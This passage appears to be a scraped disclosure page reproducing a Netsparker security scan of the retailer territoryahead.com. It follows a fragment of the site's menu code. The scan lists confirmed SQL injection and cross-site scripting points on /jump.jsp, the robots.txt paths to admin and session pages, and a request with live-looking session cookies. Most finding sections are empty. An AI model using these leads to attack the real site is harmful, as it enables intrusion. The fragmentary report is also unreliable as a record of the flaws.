Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >

<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>
<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>



<div id="main-background"><div id="container">

<table align="center" border=0 width=982 cellpadding=0 cellspacing=0>
<tr>
<td colspan="3" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>

<td><a href='http://w..

Robots.txt Identified

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

If disallowed paths are sensitive, do not write them in the robots.txt and ensure that they correctly protected by means of authentication.

- /robots.txt

/robots.txt CONFIRMED

https://www.territoryahead.com/robots.txt

Interesting Robots.txt Entries

Disallow: /admin
Disallow: /account/
Disallow: /applet/
Disallow: /basket/
Disallow: /ccm/
Disallow: /cgi-bin
Disallow: /chat/
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /examples/
Disallow: /images
Disallow: /includes/
Disallow: /mliveadmin/
Disallow: /survey/
Disallow: /usr
Disallow: /util
Disallow: /WEB-INF
Disallow: /coupon.jsp
Disallow: coupon.jsp
Disallow: /Sessions.jsp
Disallow: /SessionCount.jsp
Disallow: /SessionCountFG.jsp
Disallow: /SessionCountGR.jsp
Disallow: /SessionCount_BD.jsp
Disallow: /SessionCountBD.jsp
Disallow: /SessionCountIOS.jsp
Disallow: /SessionCountTTA.jsp
Disallow: /SessionCountIB.jsp
Disallow: /text/content/splash.html
Disallow: /splash.html

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409825; JSESSIONID=bNpe-F-pUdie
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:25:40 GMT
Server: Apache
Last-Modified: Thu, 28 Oct 2010 10:16:00 GMT
ETag: "44804d-366-a0e61800"
Accept-Ranges: bytes
Content-Length: 870
Connection: close
Content-Type: text/plain

# ROBOTS.TXT - STANDARD TEMPLATE
#
#
User-agent: *
#
# Dis-allowed directories / files
Disallow: /admin
Disallow: /account/
Disallow: /applet/
Disallow: /basket/
Disallow: /ccm/
Disallow: /cgi-bin
Disallow: /chat/
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /examples/
Disallow: /images
Disallow: /includes/
Disallow: /mliveadmin/
Disallow: /survey/
Disallow: /usr
Disallow: /util
Disallow: /WEB-INF
Disallow: /coupon.jsp
Disallow: coupon.jsp
Disallow: /Sessions.jsp
Disallow: /SessionCount.jsp
Disallow: /SessionCountFG.jsp
Disallow: /SessionCountGR.jsp
Disallow: /SessionCount_BD.jsp
Disallow: /SessionCountBD.jsp
Disallow: /SessionCountIOS.jsp
Disallow: /SessionCountTTA.jsp
Disallow: /SessionCountIB.jsp
#
# Added to disallow maintenance pages
Disallow: /text/content/splash.html
Disallow: /splash.html

XSS, Cross Site Scripting, territoryahead.com, Javascript Injection, CWE-79, CAPEC-86

Total Requests

Average Speed

GHDB, DORK Tests

VULNERABILITIES

Blind SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/jump.jsp CONFIRMED

Parameters

Request

Response

Boolean Based SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/jump.jsp CONFIRMED

Parameters

Request

Response

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/jump.jsp CONFIRMED

Parameters

Request

Response

/jump.jsp CONFIRMED

Parameters

Request

Response

/jump.jsp CONFIRMED

Parameters

Request

Response

/jump.jsp CONFIRMED

Parameters

Request

Response

/jump.jsp CONFIRMED

Parameters

Request

Response

/jump.jsp CONFIRMED

Parameters

Request

Response

Cookie Not Marked As Secure

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

/jump.jsp CONFIRMED

Identified Cookie

Request

Response

Internal Server Error

Impact

Remedy

/jump.jsp CONFIRMED

Request

Response

Cookie Not Marked As HttpOnly

Impact

Actions to Take

Remedy

External References

/jump.jsp CONFIRMED

Identified Cookie

Request

Response